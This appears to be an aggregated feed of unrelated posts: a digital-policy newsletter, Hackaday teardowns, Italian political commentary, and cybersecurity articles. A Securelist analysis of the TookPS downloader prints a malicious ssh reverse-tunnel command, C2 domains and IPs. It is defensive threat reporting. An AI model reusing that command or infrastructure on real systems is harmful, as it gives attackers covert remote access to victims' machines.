Salta al contenuto principale



"Parlerò finché sarò fisicamente in grado".
Usa, discorso da record del senatore democratico Cory Booker: dura più di 24 ore | Euronews it.euronews.com/2025/04/02/usa…


A game plan for middle powers


A game plan for middle powers
SUPPORTED BY

A game plan for middle powers

HELO, GWLEIDYDDIAETH DDIGIDOL YW HYN. For those who don't speak Welsh (like me), that's 'Hello, this is Digital Politics." I'm Mark Scott, and this edition comes to you from an unseasonably warm (well, for the United Kingdom) Welsh coastal village. Normal transmission will resume next week.

— The digital world is increasingly divided between Great Powers. That has left a lot of room for so-called 'middle powers' to exert outsized influence.

— The world of trust and safety is wading through treacherous political waters that will leave many caught between rival national governments.

— Ahead of pending US tariffs to be announced on April 2, it's worth remembering global digital exports have doubled over the last 10 years.

Let's get started.


How to make your mark in digital policymaking


THE UNITED STATES. CHINA. THE EUROPEAN UNION. When it comes to digital, those three make up the trifecta of global powers — for different reasons. The US is home to the world's biggest and most vibrant tech sector — but with few checks for citizens. China's authoritarian control of the internet has fast-tracked new services (and repression) like no other. The EU's world-leading digital regulation offers a third way between outright capitalism and state rule — with a lack of homegrown tech.

Yet in the Digital Great Gate that has engulfed this year, let's take a minute to think about middle powers. Those are the countries like Japan, the UK and Brazil that have sizable domestic markets, exert regional clout due to their size/national expertise and often chart a different path on tech that may be more useful to others caught between the vying interests of China, the US and EU.

It's unrealistic that, say, a Philippines (despite its 100m+ population) is ever going to sit side-by-side next to China to export its own vision of digital across Asia. Ditto goes for Argentina in Latin America. Wouldn't it be better to learn lessons from such middle powers that have created their own way (often with mixed reasons) rather than falling into one of the camps led by the world's three largest digital powers?

If you want to know what that looks like, spend some time in Tokyo. Yes, the world's fourth-largest global economy isn't a slouch when it comes to economic prowess. But its aging population, limited linguistic prowess (sorry to all my Japanese-speaking readers!) and positioning close to China have forced Japan to take some bold swings on digital policymaking that are worth a second look.


**A message from Microsoft** Each day, millions of people use generative AI. Abusive AI-generated content, however, can present risks to vulnerable groups such as women, children, and older adults. In a new white paper, developed in consultation with civil society, we present actionable policy recommendations to promote a safer digital environment.**


The country's recently-announced AI proposals (overview here) are anything but a copy-paste of the EU's AI Act — unlike, ahem, what South Korea tabled. Some may not think Tokyo has gone far enough by only requiring AI companies to cooperate with government AI efforts. But the title of the legislation — "Bill on the Promotion of Research, Development and Utilization of Artificial Intelligence-Related Technologies" — makes clear the proposed rules are more about enabling the emerging technology within the economy, and not about curtailing its use due to concerns AI will undermine society.

The proposals also require Japan to align with "international standards." What those AI standards will be is currently unclear. But it's a hat tip to the wider global (read: Western) policymaking conversation around AI where Japan has continued to punch above its weight. That goes for everything from Tokyo's work around the so-called Hiroshima Process on generative AI to its closed-door leadership via the Organization for Economic Cooperation and Development on global data governance standards (crucial for the ongoing sharing of data internationally).

There are a couple of lessons from Japan's digital policymaking that apply to other countries seeking to make their mark.

First, don't try to do everything at once. Tokyo doesn't want to convince everyone to follow its lead. Instead, it often takes a pragmatic view on a small number of issues where it believes it can make a difference and that will benefit its local businesses/citizens.

Second, a willingness to play host to the bigger powers, which is what Japan did with the Hiroshima Process, can buy you international political capital, on both digital and non-digital issues, that you can tap into further down the line. Recognizing where a country can add value — as a convener, for instance — allows local officials to navigate the inherent difficulties when trying to balance the interests of the Great Digital Powers.

Thanks for reading the free monthly version of Digital Politics. Paid subscribers receive at least one newsletter a week. If that sounds like your jam, please sign up here.

Here's what paid subscribers read in March:
— Claims that online safety rules are censorship have gone global; Europe's digital rules are not seen to help its citizens; Global data flows are not slowing down. More here.
— A readout on Trump 2.0's approach to digital policy; Why Canada worries about US interference in its election; A debrief on the EU's AI 'gigafactories.' More here.
— Four ways that social media can be made more transparent and accountable via supporting how outsiders access platform data. More here.
— Why we need to come up with a better version of 'tech sovereignty;' Apple's antitrust loss in Brussels is good for (most) Big Tech; AI models' lack of regional diversity. More here.

That's where middle powers can truly come into their own. By outlining a nimble digital policy agenda that centers on a small number of targeted objectives — versus trying to boil the ocean with an overly-complex and broad agenda — countries beyond the EU, China and the US can find niche tech issues that benefit their local constituencies.

That's the positive view. Now for the negative: the UK.

I've already expressed my reservations for London's quixotic approach to digital policy. In short: the only thing that matters, really, is boosting foreign direct investment into the country's region-leading tech sector. And, to be clear, there's nothing wrong with that.

But that hasn't stopped British politicians and policymakers from trying to bite off more than they can chew on everything from online safety to artificial intelligence to digital competition. In recent years, the UK has swung for the fences on all three of those areas, promoting itself as a world-leading center of digital regulation and tech-related industry. You can have the Online Safety Act AND be home to scores of global platform workers. You can pass sophisticated digital antitrust rules AND support the acquisition of local startups by Big Tech giants.

Frankly, I just don't buy it. Unlike Japan, the UK tries to play in the same realm as the US, China and the EU, but doesn't have the economic firepower or the regulatory muscle to do that well. Instead, London finds itself in the worst of all worlds. A middle power (with a lot of strong attributes upon which to call) that is too small to play in the Big Leagues but is unable — or unwilling? — to relegate itself to the second tier where it could really make a difference.

That should be a warning to other countries seeking to find their own path on digital policymaking. Don't pretend you can go head-to-head with global powers when you'll only end up on the worse side of that encounter.

More importantly — and this is especially true for London and its longstanding desire to remain in lockstep with the US — don't change your own digital agenda to fit into the ever-changing policies of longstanding allies.

London's decision, at the last minute, not to sign the communiqué at the recent Paris AI Action Summit because the US had decided not to hurt that country's global reputation with not much upside gained with Washington. The UK's "will they, or won't they" approach to pulling back on exiting digital regulation equally has not positioned the Brits as a safe pair of hands in the ever complex world of global tech policy.

In short, when it comes to navigating a country's own path on digital policy, be more like Japan, and less like the UK.


Chart of the Week


DONALD TRUMP'S ADMINISTRATION WILL UNVEIL a cavalcade of global tariffs on April 2 which some in the White House are calling "Liberation Day."

Thankfully, much of the digital world has escaped these threats as negotiations via the World Trade Organization mostly exempted so-called "electronic transmissions" (read: online purchases) from such duties.

It's a good thing, too. At least for global trade. Over the last decade, trade via so-called "digitally-delivered services" has roughly doubled, based on global exports (see left chart) and imports (see right chart.)

A game plan for middle powers
A game plan for middle powers

Source: World Trade Organization


Geopolitics is coming for Trust & Safety Inc


LAST WEEK WAS THE SECOND INSTALLMENTof my (London-based) tech policy meet-up series known as "Marked as Urgent." I run it alongside Ben Whitelaw (and his Everything in Moderation newsletter) and Georgia Iacovou (and her Horrific/Terrific newsletter.) Photos here — and let me know if you're down for us bringing the roadshow to your city. We're game.

The topic of the night was: "What next for Trust & Safety?" Disclaimer: I can be a little like a one-trick pony. But I spoke about how the world of (international) politics is almost certainly going to hit the T&S industry like a ton of bricks in the coming months. I'm not sure many in the sector either know or are prepared for what is coming down the pike.

Let's walk through this.

First, there is a growing divide, in the democratic world, between the US and everyone else. No, I'm not talking about Washington's overall shift in policy. Instead, the likes of Australia, Canada and South Korea are quickly moving to impose rules on online platforms to moderate illegal speech — and force companies to explain exactly how they are doing that.

In the US, Trump's position on any form of content moderation — that it is a form of illegal censorship — is well known. It's now getting implemented via Congressional hearings, White House directives and efforts by US federal agencies. That comes despite a growing sophistication in the US-based trust and safety sector that remains arguably the largest, globally, despite the recent shift in political winds.

Second, this split between the US and everyone else on content moderation will force companies to pick sides. Some will do it happily (looking at you, Meta.) Others will shift gears out of either regulatory necessity or political calculation to keep them on the right side of specific world leaders. Yet there will be inherent conflicts when rank-and-file trust and safety experts continue the daily work of complying with national online safety rules, while companies' top executives make public statements about why they believe such work should be stopped.


**A message from Microsoft** New technologies like AI supercharge creativity, business, and more. At the same time, we must take steps to ensure AI is resistant to abuse. Our latest white paper, "Protecting the Public from Abusive AI-Generated Content across the EU," highlights the weaponization of women’s nonconsensual imagery, AI-powered scams and financial fraud targeting older adults, and the proliferation of synthetic child sexual abuse.

The paper outlines steps Microsoft is taking to combat these risks and provides recommendations as to how the EU's existing regulatory framework can be used to combat the abuse of AI-generated content by bad actors. We thank Women Political Leaders, the MenABLE project, the Internet Watch Foundation, the WeProtect Global Alliance, and the European Senior’s Union for their important work and support. Click here to read more.**


I don't envy those inside the platforms who will be stuck between those public statements and the day-to-day requirements of regulatory compliance.

Yet for those outside of the US, don't expect the political world to leave you alone, either.

Now that we are a couple of years into mandatory online safety regimes (well, almost a decade if you're in Australia), there are few lawmakers who are making the case, publicly, about why such rules are good for voters. Sure, national leaders make statements about online kids safety, digital terrorism or (Russian) foreign interference whenever a big news event happens. But there's no elected official really explaining to people why trust and safety is crucial to both creating a more inclusive online environment and (important for any politician) why it's in the country's national interest.

Sign up for Digital Politics


Thanks for getting this far. Enjoyed what you've read? Why not receive weekly updates on how the worlds of technology and politics are colliding like never before. The first two weeks of any paid subscription are free.

Subscribe
Email sent! Check your inbox to complete your signup.


No spam. Unsubscribe anytime.

That's a problem. It's a problem because, at some point, the White House is likely to impose retaliatory tariffs on a country that announces some form of fine and/or remedy on an American social media giant. The Trump 2.0 administration specifically called out the UK and EU online safety regimes for undermining freedom of speech. At this point, we should take Washington at its word about taking such future action.

If/when those tariffs start, which politician in those targeted countries is going to stand up for these regimes? Which leader will be willing to go to the mattresses to defend a national online safety regime so that it doesn't become a bargaining chip in wider trade negotiations with the US?

Currently, I don't see clear support from non-US politicians on those points. It should concern anyone working in the trust and safety industry that there is no mainstream politically buy-in for the work that they do. Especially, as stated above, when there's also growing internal apathy in many of these companies for that work, too.

In the coming months, I'm still unclear how this will play out. Both inside social media giants and within countries' political establishments. But what I do know is that all forms of platform governance will become increasingly intertwined with geopolitics in the months ahead.

Thanks for getting this far. If you're interested in sponsoring future editions of Digital Politics, please get in touch on digitalpolitics@protonmail.com


What I'm reading


— The European Commission announced $1.4 billion in financial support for artificial intelligence, cybersecurity and digital skills across the 27-country bloc. More here.

— The Carnegie Endowment for International Peace goes deep into how decentralized versions of social media platforms represent a new way to govern online spaces. More here.

— The US Office of the Director of National Intelligence published its annual threat assessment, including areas associated with tech. More here.

— Researchers from the University of Münster in Germany delved into how TikTok audio clips were used in disinformation campaigns related to the war in Ukraine. More here.

— British regulators explained why they believed the country's existing rules would foster the development of next-generation AI models. More here.

— The International Association of Privacy Professionals and Harvard's Berkman Klein Center for Internet & Society are organizing a two-day retreat for digital policy leaders in June. They've just opened up registrations here.


digitalpolitics.co/newsletter0…



È online il nuovo numero di Magda, la newsletter di Centrum Report, progetto complementare al podcast Václav, rispetto al quale ha un taglio più culturale. Ci potete trovare suggerimenti su libri, film, mostre e tante altre cose.

Inoltre è il posto in cui raccogliamo i nostri interventi sulla stampa e altri media, i nostri lavori e i nostri longform. In caso di fatti di particolare rilevanza vi diamo qualche aggiornamento che troverà sviluppo e integrazione su Václav.

Questo mese per esempio parliamo della legge polacca sulla sospensione del diritto di asilo, e su quella ungherese che vieta l'organizzazione pubblica del Pride.

Potete leggere la newsletter cliccando sul link in calce. Il nostro suggerimento è quello di iscrivervi gratuitamente in modo da riceverla nella vostra casella di posta.

Buona lettura!

@centroesteuropa@feddit.it

magdacentrumreport.substack.co…



The Lowly Wall Wart Laid Bare


Getting a look at the internals of a garden variety “wall wart” isn’t the sort of thing that’s likely to excite the average Hackaday reader. You’ve probably cracked one open yourself, and even if you haven’t, you’ve likely got a pretty good idea of what’s inside that sealed up brick of plastic. But sometimes a teardown can be just as much about the journey as it is the end result.

Truth be told, we’re not 100% sure if this teardown from [Brian Dipert] over at EDN was meant as an April Fool’s joke or not. Certainly it was posted on the right day, but the style is close enough to some of his previous work that it’s hard to say. In any event, he’s created a visual feast — never in history has an AC/DC adapter been photographed so completely and tastefully.
An Ode to the Diode
[Brian] even goes so far as to include images of the 2.5 lb sledgehammer and paint scraper that he uses to brutally break open the ultrasonic-welded enclosure. The dichotomy between the thoughtful imagery and the savage way [Brian] breaks the device open only adds to the surreal nature of the piece. Truly, the whole thing seems like it should be part of some avant garde installation in SoHo.

After he’s presented more than 20 images of the exterior of the broken wall wart, [Brian] finally gets to looking at the internals. There’s really not much to look at, there’s a few circuit diagrams and an explanation of the theory behind these unregulated power supplies, and then the write-up comes to a close as abruptly as it started.

So does it raise the simple teardown to an art form? We’re not sure, but we know that we’ll never look at a power adapter in quite the same way again.


hackaday.com/2025/04/02/the-lo…



Uto Ughi per i Giovani, il #3aprile dalle ore 11 si svolgerà la presentazione del progetto, presso la Basilica Papale di San Francesco in Assisi.



Proteggere i diritti dell’infanzia in Palestina. Rinforzare la responsabilità internazionale.


@Notizie dall'Italia e dal mondo
Il video dell'evento parallelo al 58esimo Consiglio dei diritti umani delle Nazioni Unite, organizzato da Defence for Children International e trasmesso in collaborazione con Pagine Esteri.
L'articolo Proteggere i diritti



In questi giorni potrebbero arrivare le lettere di licenziamento ai 121 lavoratori e lavoratrici dell’ex-GKN. Il 31 Marzo è stato l’ultimo giorno della procedura di mobilità ed è stata negata dall’azienda la possibilità di proroga della mobilità in attesa della pubblicazione del piano concordatario sulla cui base si sarebbe potuto impostare un piano di salvaguardia dei posti di lavoro.
Ancora una volta la società QF si è mostrata indisponibile alla salvaguardia di posti di lavoro e sorda alle proposte di reindustrializzazione del sito. Questo viene reso ancora più grave dalla violazione delle norme contro la delocalizzazione, di cui è stata chiesta dalla GKN e dalla FIOM applicazione.
La più importante lotta operaia italiana, che era riuscita anche nell’impresa di proporre dei piani di reindustrializzazione del sito e di raccolta di più di un milione di euro da immettere nel capitale sociale della Cooperativa che avrebbe svolto queste nuove attività, rischia di finire.
Come Giovani Comunisti/e siamo dal primo giorno stati a fianco di questa lotta e degli operai e delle operaie che per quasi 4 lunghi anni l’hanno portata avanti. Crediamo che debba intervenire il MIMIT al fine di salvaguardare i posti di lavoro e la possibilità che in quel luogo si possa continuare a produrre, tramite la Cooperativa della GKN, non più secondo una logica padronale bensì di cooperazione e mutuo soccorso.

Paolo Bertolozzi, coordinatore nazionale Giovani Comunisti/e
Auro Bizzoni, responsabile nazionale Lavoro Giovani Comunisti/e



TookPS: DeepSeek isn’t the only game in town


In early March, we published a study detailing several malicious campaigns that exploited the popular DeepSeek LLM as a lure. Subsequent telemetry analysis indicated that the TookPS downloader, a malware strain detailed in the article, was not limited to mimicking neural networks. We identified fraudulent websites mimic official sources for remote desktop and 3D modeling software, alongside pages offering these applications as free downloads.

Malicious websites
Malicious websites

UltraViewer, AutoCAD, and SketchUp are common business tools. Therefore, potential victims of this campaign include both individual users and organizations.

Our telemetry also detected file names such as “Ableton.exe” and “QuickenApp.exe”, alongside malicious websites. Ableton is music production software for composition, recording, mixing, and mastering, and Quicken is a personal finance app for tracking expenses, income, debts, and investments across various accounts.

TookPS


In our report on attacks exploiting DeepSeek as a lure, we outlined the infection chain initiated by Trojan-Downloader.Win32.TookPS. Let us delve into this. Upon infiltrating a victim’s device, the downloader reaches out to its C2 server, whose domain is embedded in its code, to retrieve a PowerShell script. Different malware samples communicate with different domains. For example, the file with the MD5 hash 2AEF18C97265D00358D6A778B9470960 reached out to bsrecov4[.]digital, which was inactive at the time of our research. It received the following base64-encoded command from that domain:

Original command
Original command

Decoding reveals the PowerShell command being executed:

The variable “$TookEnc” stores an additional base64-encoded data block, also executed in PowerShell. Decrypting this reveals the following command:

Decoded command from $TookEnc variable shown in the previous screenshot
Decoded command from $TookEnc variable shown in the previous screenshot

Example of decrypting another command from $TookEnc variable
Example of decrypting another command from $TookEnc variable

Although different samples contain different URLs, the command structure remains identical. These commands sequentially download and execute three PowerShell scripts from the specified URL. The first script downloads “sshd.exe”, its configuration file (“config”), and an RSA key file from the C2 server. The second script retrieves command-line parameters for “sshd” (remote server address, port, and username), and then runs “sshd”.

Example of a malicious PowerShell command generated by the PowerShell script:
ssh.exe -N -R 41431:localhost:109 Rc7DexAU73l@$ip_address -i "$user\.ssh\Rc7DexAU73l.41431" -f "$user\.ssh\config"
This command starts an SSH server, thereby establishing a tunnel between the infected device and the remote server. For authentication, it uses the RSA key downloaded earlier, and the server configuration is sourced from the “config” file. Through this tunnel, the attacker gains full system access, allowing for arbitrary command execution.

The third script attempts to download a modified version of the Backdoor.Win32.TeviRat malware onto the victim’s machine, which is a well-known backdoor. The sample we obtained uses DLL sideloading to modify and deploy the TeamViewer remote access software onto infected devices. In simple terms, the attackers place a malicious library in the same folder as TeamViewer, which alters the software’s default behavior and settings, hiding it from the user and providing the attackers with covert remote access. This campaign used the domain invoicingtools[.]com as the C2.

Part of the script that downloads Backdoor.Win32.TeviRat
Part of the script that downloads Backdoor.Win32.TeviRat

Additionally, Backdoor.Win32.Lapmon.* is downloaded onto the compromised device. Unfortunately, we were not able to establish the exact delivery method. This backdoor uses the domain twomg[.]xyz as its C2.

In this manner, the attackers gain complete access to the victim’s computer in variety of ways.

Infrastructure


The malicious scripts and programs in this attack primarily used domains registered in early 2024, hosted at two IP addresses:

C2 domains and corresponding IPs
C2 domains and corresponding IPs

We found no legitimate user-facing resources at these IP addresses. Alongside the campaign-related domains, we also found other domains long blocked by our security solutions. This strongly suggests these attackers had used other tools prior to TookPS, Lapmon, and TeviRat.

Takeaways


The DeepSeek lure attacks were merely a glimpse into a large-scale campaign targeting both home users and organizations. The malware distributed by the attackers was disguised as popular software, including business-critical applications. They attempted to gain covert access to the victim’s device through a variety of methods after the initial infection.

To protect against these attacks, users are advised to remain vigilant and avoid downloading pirated software, which may represent a serious threat.

Organizations should establish robust security policies prohibiting software downloads from dubious sources like pirated websites and torrents. Additionally, regular security awareness training is essential for ensuring a proper level of employee vigilance.

IOCs


MD5
46A5BB3AA97EA93622026D479C2116DE
2DB229A19FF35F646DC6F099E6BEC51F
EB6B3BCB6DF432D39B5162F3310283FB
08E82A51E70CA67BB23CF08CB83D5788
8D1E20B5F2D89F62B4FB7F90BC8E29F6
D26C026FBF428152D5280ED07330A41C
8FFB2A7EFFD764B1D4016C1DF92FC5F5
A3DF564352171C207CA0B2D97CE5BB1A
2AEF18C97265D00358D6A778B9470960
8D0E1307084B4354E86F5F837D55DB87
7CB0CA44516968735E40F4FAC8C615CE
62CCA72B0BAE094E1ACC7464E58339C0
D1D785750E46A40DEF569664186B8B40
EE76D132E179623AD154CD5FB7810B3E
31566F18710E18F72D020DCC2FCCF2BA
F1D068C56F6023FB25A4F4F0CC02E9A1
960DFF82FFB90A00321512CDB962AA5B
9B724BF1014707966949208C4CE067EE

URLs
Nicecolns[.]com
sketchup-i3dmodels-download[.]top
polysoft[.]org
autocad-cracked[.]com
ultraviewer[.]icu
ultraview-ramotepc[.]top
bsrecov4[.]digital
downloader[.]monster
download[.]monster
pstuk[.]xyz
tukeps2ld[.]online
twomg[.]xyz
tuntun2[.]digital
invoicingtools[.]com
tu02n[.]website
inreport2[.]xyz
inrep[.]xyz

IPs
88[.]119.175.187
88[.]119.175.184
88[.]119.175.190


securelist.com/tookps/116019/



Coloni israeliani delusi dalle macerie di Jenin: «Non ci basta, vogliamo questa città come Gaza»


@Notizie dall'Italia e dal mondo
Il giornale Yisrael HaYom riferisce di un tour organizzato dai comandi militari per mostrare i risultati dell'operazione "Muro di Ferro". I coloni chiedono di intensificare ulteriormente l’offensiva militare



L’automazione non ci ha reso liberi dal lavoro, e dallo sfruttamento


@Informatica (Italy e non Italy 😁)
Chi e come lavorerà nell’era in cui il mito dell’intelligenza artificiale sta prendendo il posto di quello dell’automazione? Ne abbiamo parlato con chi ha studiato l’automazione dal Dopoguerra ad oggi, il professore di Storia contemporanea Jason Resnikoff.
L'articolo L’automazione



Aiuto per trattamento antitarlo


A tutto il Fediverso, ripeto, a tutto il Fediverso.

Allarme, ripeto allarme.

May Day, May Day!

Da notti sento qualcosa che si sta sgranocchiando l'armadio nella mia camera da letto, temo siano tarli.

Devo fare un trattamento antitarlo ma non l'ho mai fatto, e in più sono un uomo moderno, di quelli che non sanno fare niente (al contrario degli uomini di una volta, che sapevano fare tutto).

Qualcuno di voi ha esperienza di trattamenti del genere?

Non datemi link a pagine che ne parlano, quelli li trovo da me, cerco gente che l'ha fatto per davvero.

Basta Trump, basta Vance, basta Musk, da oggi vi voglio tutti concentrati sul mio armadio.

Passo.

in reply to Max su Poliverso 🇪🇺🇮🇹

@max esistono degli appositi veleni li trovi sia dai consorzi agrari che nei negozi di bricolage. Con grande pazienza ed una buona siringa, devi ispezionare il legno e iniettare il veleno in ogni buchetto che trovi. Quindi inserisci nel buchetto uno stuzzicadenti, che ha due funzioni: 1 ti ricorda che quel buco è già stato trattato.
2 il tarlo se c'era resta murato dentro fino a che muore.
Quando hai finito il trattamento su tutto il mobile avrai un Novello San Sebastiano..
A quel punto con una lametta o con un cutter tagli tutti gli stuzzicadenti in maniera da tappare il foro a livello, in funzione del colore del mobile passerai qualcosa per mascherare l'esistenza degli stuzzicadenti e quindi darai un prodotto a finitura.
Buon lavoro
in reply to Maurizio

@maurizio

Ti ringrazio molto.

Purtroppo non vedo buchi... ripasserò con una lente di ingrandimento ma possibile che siano così piccoli da essere invisibili?

Ho perlustrato gli interni e la parte superiore, le pareti esterne non ancora in maniera approfondita ma sono trattate e ho pensato che se fossi stato un tarlo avrei preferito entrare dall'alto, dove c'è il legno più grezzo, non trattato.

A dire il vero all'interno ci sono buchi ma sono fori fatti ad hoc, hanno un diametro da 5mm, una volta c'erano delle viti che tenevano qualcosa poi è stato smontato il "qualcosa" e sono rimasti i buchi. Sono anche quelli buchi a rischio?



Il ritorno di Mariani in Mbda e le sfide future della missilistica europea

@Notizie dall'Italia e dal mondo

Lorenzo Mariani ha (nuovamente) assunto il ruolo di Executive group director sales & business development, nonché managing director, di Mbda Italia, succedendo a Giovanni Soccodato. Mariani ritorna dunque in Mbda Italia dopo un periodo in Leonardo, dove ha ricoperto il



Cantieristica, il nucleare ha il potenziale per rivoluzionare il settore. Ecco come

@Notizie dall'Italia e dal mondo

Il nucleare potrebbe rappresentare una svolta, non solo per l’autonomia energetica nazionale, ma anche per il settore della cantieristica. Il dibattito sulla possibilità di un ritorno del nucleare in Italia sta aprendo a diverse prospettive circa l’impiego di nuove tecnologie



Oggi in occasione della Giornata mondiale per la Consapevolezza sull'Autismo il Palazzo dell'Istruzione è stato illuminato di blu.

Il Ministro Giuseppe Valditara ha invitato le scuole a organizzare momenti di condivisione e di approfondimento.

Poliverso & Poliversity reshared this.



Sicurezza cyber, la chiave è la partnership tra umano e intelligenza artificiale


@Informatica (Italy e non Italy 😁)
Le capacità di protezione e difesa nella cyber security possono essere migliorate in un mix di collaborazione arricchita ed efficacia aumentata attraverso l’impiego di un “ibrido operativo” formato dall'individuo e agenti di AI.



Attacco informatico via Teams: un semplice messaggio può compromettere la tua azienda!


Con l’uso crescente di strumenti di collaborazione come Microsoft Teams, le aziende devono essere consapevoli dei rischi legati a possibili attacchi informatici. Implementare misure di sicurezza avanzate e formare adeguatamente gli utenti diventa essenziale per contrastare le minacce. In risposta a questo problema, Microsoft ha annunciato l’introduzione di notifiche di sicurezza in Quick Assist, progettate per avvisare gli utenti di possibili tentativi di truffa legati al supporto tecnico. Inoltre, si consiglia alle organizzazioni di limitare o disattivare l’uso di Quick Assist e altri strumenti di accesso remoto, qualora non siano strettamente necessari, per ridurre il rischio di compromissione.

Un attacco sofisticato con vishing e strumenti legittimi


Un recente rapporto del Cyber Defence Centre di Ontinue ha documentato un attacco in cui gli hacker hanno utilizzato una combinazione di ingegneria sociale, vishing (phishing vocale) e software di accesso remoto per infiltrarsi nei sistemi aziendali.

La tecnica di attacco prevedeva l’invio di un messaggio su Microsoft Teams contenente un comando PowerShell dannoso. Approfittando della fiducia degli utenti nelle comunicazioni interne, il cybercriminale si spacciava per un tecnico IT per convincere la vittima ad eseguire il comando e a concedere accesso remoto attraverso Quick Assist. Questa tattica è coerente con le tecniche adottate dal gruppo Storm-1811, noto per utilizzare vishing e strumenti di supporto remoto per ottenere il controllo dei dispositivi bersaglio.

Il payload e l’installazione della backdoor


Dopo aver ottenuto l’accesso iniziale, gli attaccanti hanno sfruttato il sideloading DLL per eseguire codice malevolo attraverso un file binario firmato e legittimo di TeamViewer.exe, che ha caricato un modulo dannoso TV.dll.

Questo approccio consente di eludere i sistemi di sicurezza, poiché l’eseguibile sembra autentico. La seconda fase dell’attacco ha comportato l’esecuzione di una backdoor basata su JavaScript tramite Node.js (hcmd.exe), la quale ha stabilito una connessione persistente ai server di comando e controllo degli aggressori.

Grazie alle funzionalità socket, gli hacker potevano eseguire comandi da remoto senza essere rilevati facilmente.

Strategie di rilevamento e prevenzione


La catena di attacco osservata rientra in diverse categorie del framework MITRE ATT&CK, tra cui:

  • T1105 – Trasferimento di strumenti malevoli
  • T1656 – Impersonificazione
  • T1219 – Utilizzo di software di accesso remoto
  • T1218 – Esecuzione tramite binari firmati
  • T1197 – Abuso dei lavori BITS

Per mitigare il rischio di simili attacchi, gli esperti di sicurezza consigliano alle aziende di limitare l’uso di strumenti di accesso remoto non indispensabili e di disabilitare le connessioni esterne a Teams. Inoltre, la formazione dei dipendenti su tecniche di ingegneria sociale e phishing vocale è fondamentale per ridurre la probabilità di cadere vittima di queste sofisticate campagne malevole.

L'articolo Attacco informatico via Teams: un semplice messaggio può compromettere la tua azienda! proviene da il blog della sicurezza informatica.



Ucraina, disinquinare la discussione pubblica sul conflitto


Valigia Blu evidenzia le omissioni, le incongruenze e alcune distorsioni presenti nell’articolo di Kuperman.
Buona lettura


A Toothbrush Hacked, in Three Parts


It’s official, we’re living in the future. Certainly that’s the only explanation for how [wrongbaud] was able to write a three-part series of posts on hacking a cheap electric toothbrush off of AliExpress.

As you might have guessed, this isn’t exactly a hack out of necessity. With a flair for explaining hardware hacking, [wrongbaud] has put this together as a practical “brush-up” (get it?) on the tools and concepts involved in reverse engineering. In this case, the Raspberry Pi is used as a sort of hardware hacking multi-tool, which should make it relatively easy to follow along.
Modified image data on the SPI flash chip.
The first post in the series goes over getting the Pi up and running, which includes setting up OpenOCD. From there, [wrongbaud] actually cracks the toothbrush open and starts identifying interesting components, which pretty quickly leads to the discovery of a debug serial port. The next step is harassing the SPI flash chip on the board to extract its contents. As the toothbrush has a high-res color display (of course it does), it turns out this chip holds the images which indicate the various modes of operation. He’s eventually able to determine how the images are stored, inject new graphics data, and write it back to the chip.

Being able to display the Wrencher logo on our toothbrush would already be a win in our book, but [wrongbaud] isn’t done yet. For the last series in the post, he shows how to extract the actual firmware from the microcontroller using OpenOCD. This includes how to analyze the image, modify it, and eventually flash the new version back to the hardware — using that debug port discovered earlier to confirm the patched code is running as expected.

If you like his work with a toothbrush, you’ll love seeing what [wrongbaud] can do with an SSD or even an Xbox controller.


hackaday.com/2025/04/02/a-toot…



Yaroslav Zheleznyak è un deputato della Rada ucraina eletto nelle liste di Holos, partito liberale, atlantista ed europeista. Giovedì scorso ha pubblicato un post sul suo canale Telegram dopo aver letto il nuovo accordo sui minerali proposto dagli Stati Uniti a Zelensky e quel che descrive è al limite dell’estorsione. Zheleznyak sintetizza così: “Il testo che ho visto è semplicemente orribile: tutte le 18 sezioni. Questo non è più un memorandum d'intenti quadro, come lo era prima dello scandaloso incontro nello Studio Ovale). Si tratta di un accordo molto ampio e molto chiaro, e non è a nostro favore"

Queste le condizioni del nuovo accordo:

La formazione di un consiglio di cinque membri per la gestione del fondo che verrà creato per accumulare i profitti, tre dei quali provenienti dagli Stati Uniti, tutti con pieno potere di veto.
L’elenco delle risorse naturali inserite nell’accordo è ampliato rispetto al precedente e ora comprende anche petrolio e gas da giacimenti vecchi e nuovi.
Gli USA non prevedono alcun ulteriore investimento per la difesa ucraina in quanto ritengono di aver già contribuito nel 2022.
Gli USA hanno diritto di prelazione su tutti gli investimenti in progetti infrastrutturali e nello sfruttamento delle risorse minerarie dell'Ucraina, compresi petrolio e gas e le infrastrutture energetiche
Kiev dovrà destinare il 50 per cento dei ricavi derivanti da nuovi progetti infrastrutturali e dallo sfruttamento delle risorse naturali al fondo per la copertura delle spese statunitensi dall'inizio della guerra, mentre gli Stati Uniti avrebbero diritto all'intero profitto più un rendimento annuo del 4 per cento fino al recupero del loro investimento.
Il contratto è a tempo indeterminato ed ogni modifica potrà essere fatta solo previa accettazione da parte degli USA.
Le imprese americane avranno tutti i vantaggi sullo sfruttamento delle risorse. Anche in caso di una nuova guerra. L'intesa prevede un indennizzo in caso di blocco dell'estrazione per cause di forza maggiore, e un regime fiscale speciale che riduce le tasse per le aziende statunitensi.
Gli USA non si impegnano in nessuna garanzia di sicurezza.
Di un accordo del genere si potrebbe dire una sola cosa: il pizzo della mafia è meno oneroso. Zelensky ha abbozzato una reazione a dir poco blanda, con un solo sussulto, anche di un certo rilievo, quando ha dichiarato che non riconosce i soldi ricevuti dagli USA come debito. Ma è l’unica scintilla, pure soffusa. Il presidente ucraino non ha infatti rifiutato l’accordo e anzi è pronto a venire incontro agli interessi USA e alle volontà di Trump, aprendo alla firma in tempi brevi dell’accordo. La richiesta massima da parte sua sarà l’inserimento di garanzie di sicurezza, ma non sul resto dell’accordo.

Gli USA fanno gli USA, la storia ce lo insegna e l’Ucraina è l’ennesima vittima, forse una delle più grandi. Le fasi sono sempre le stesse: prima ti adulano, poi ti mandano in guerra e alla fine ti spolpano. Hanno sempre fatto così, con ogni stato “amico”. Eppure, nonostante la realtà sia così chiara, in Europa si decide per un riarmo da 800 miliardi inutile e atto solo a salvare un settore industriale in discesa libera e con una Germania che rischia di entrare in una crisi produttiva senza precedenti. L’Ucraina in tutto ciò non ricava nulla. Stellantis e Volkswagen sì.

A distanza di 11 anni da Euromaidan e 3 dall’inizio dell’intervento russo alcune conclusioni le possiamo tirare, anzi, ribadire. L’Ucraina è un mezzo con la quale gli Stati Uniti hanno cercato e cercano di rimandare la fine della loro egemonia sul mondo, producendo una instabilità senza precedenti in tutto il mondo. L’Europa è in piena isteria, causata da una crisi produttiva industriale sempre più pesante e dall’estrazione continua di capitali da parte degli “alleati” USA, che sono obbligati dal loro sistema economico semi deindustrializzato a disossare il vecchio continente per non far scoppiare la bolla finanziaria, che intanto si ingrossa.

